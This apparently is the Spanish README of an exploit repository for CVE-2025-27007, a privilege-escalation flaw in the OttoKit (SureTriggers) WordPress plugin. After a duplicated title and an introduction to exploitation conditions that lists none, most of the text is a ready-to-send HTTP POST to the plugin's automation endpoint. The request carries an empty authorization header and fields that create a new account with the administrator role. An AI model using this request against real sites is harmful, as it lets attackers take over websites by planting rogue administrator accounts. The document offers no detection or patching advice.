
explotación de CVE-2025-27007, una vulnerabilidad crítica de escalada de privilegios sin autenticación en el plugin OttoKit (anteriormente SureTriggers) de WordPress.
Explotación de CVE-2025-27007, una vulnerabilidad crítica de escalada de privilegios no autorizada en el plugin OttoKit (anteriormente conocido como SureTriggers) para WordPress. Este repositorio describe cómo un atacante puede crear una cuenta de administrador en un sitio WordPress vulnerable.
La vulnerabilidad puede ser explotada bajo las siguientes circunstancias:
La siguiente solicitud apunta al endpoint /wp-json/sure-triggers/v1/automation/action para crear una cuenta de administrador:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists